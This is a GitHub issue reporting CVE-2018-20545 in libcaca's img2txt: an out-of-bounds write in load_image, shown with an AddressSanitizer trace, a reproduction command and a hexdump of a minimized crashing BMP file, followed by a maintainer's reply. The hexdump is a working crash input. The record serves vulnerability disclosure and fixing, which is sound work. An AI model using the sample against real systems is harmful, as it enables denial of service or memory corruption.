Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2018-20545 #37

Closed
fgeek opened this issue Dec 29, 2018 · 2 comments
Closed

CVE-2018-20545 #37

fgeek opened this issue Dec 29, 2018 · 2 comments

Comments

@fgeek
Copy link

fgeek commented Dec 29, 2018

Following vulnerability has been reported to Red Hat issue tracker:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20545
https://bugzilla.redhat.com/show_bug.cgi?id=1652621

./img2txt POC0

version: libcaca0.99beta19
Summary: 

There is an illegal WRITE memory access at src/common-image.c:203 (function:load_image )in libcaca latest version.

Description:

The asan debug is as follows:

$./img2txt POC0

=================================================================
==28346==ERROR: AddressSanitizer: SEGV on unknown address 0x6020ffff0030 (pc 0x5643f5ff307a bp 0x603000000010 sp 0x7ffde48056e0 T0)
==28346==The signal is caused by a WRITE memory access.
    #0 0x5643f5ff3079 in load_image /home/company/real/libcaca-master/src/common-image.c:203
    #1 0x5643f5ff17c7 in main /home/company/real/libcaca-master/src/img2txt.c:171
    #2 0x7fde504511c0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x211c0)
    #3 0x5643f5ff1f09 in _start (/home/company/real/libcaca-master/install_asan/bin/img2txt+0x2f09)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/company/real/libcaca-master/src/common-image.c:203 in load_image
==28346==ABORTING
@fgeek
Copy link
Author

fgeek commented Dec 29, 2018

Confirmed in f1267fb. Minimized sample CVE-2018-20545.zip with afl-tmin (SHA1: 804ae44ad65e54d69f23eb88af73cae77c2a0d1e)

00000000  42 4d 30 30 30 30 30 30  30 30 76 00 00 00 28 00  |BM00000000v...(.|
00000010  00 00 00 00 01 00 00 00  01 00 01 00 04 00 00 00  |................|
*
00000021

@samhocevar
Copy link
Contributor

Thanks for the detailed report. Note that this only happens when the fallback BMP loader is used; in general, img2txt should be built with the Imlib2 library (autodetected by ./configure).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants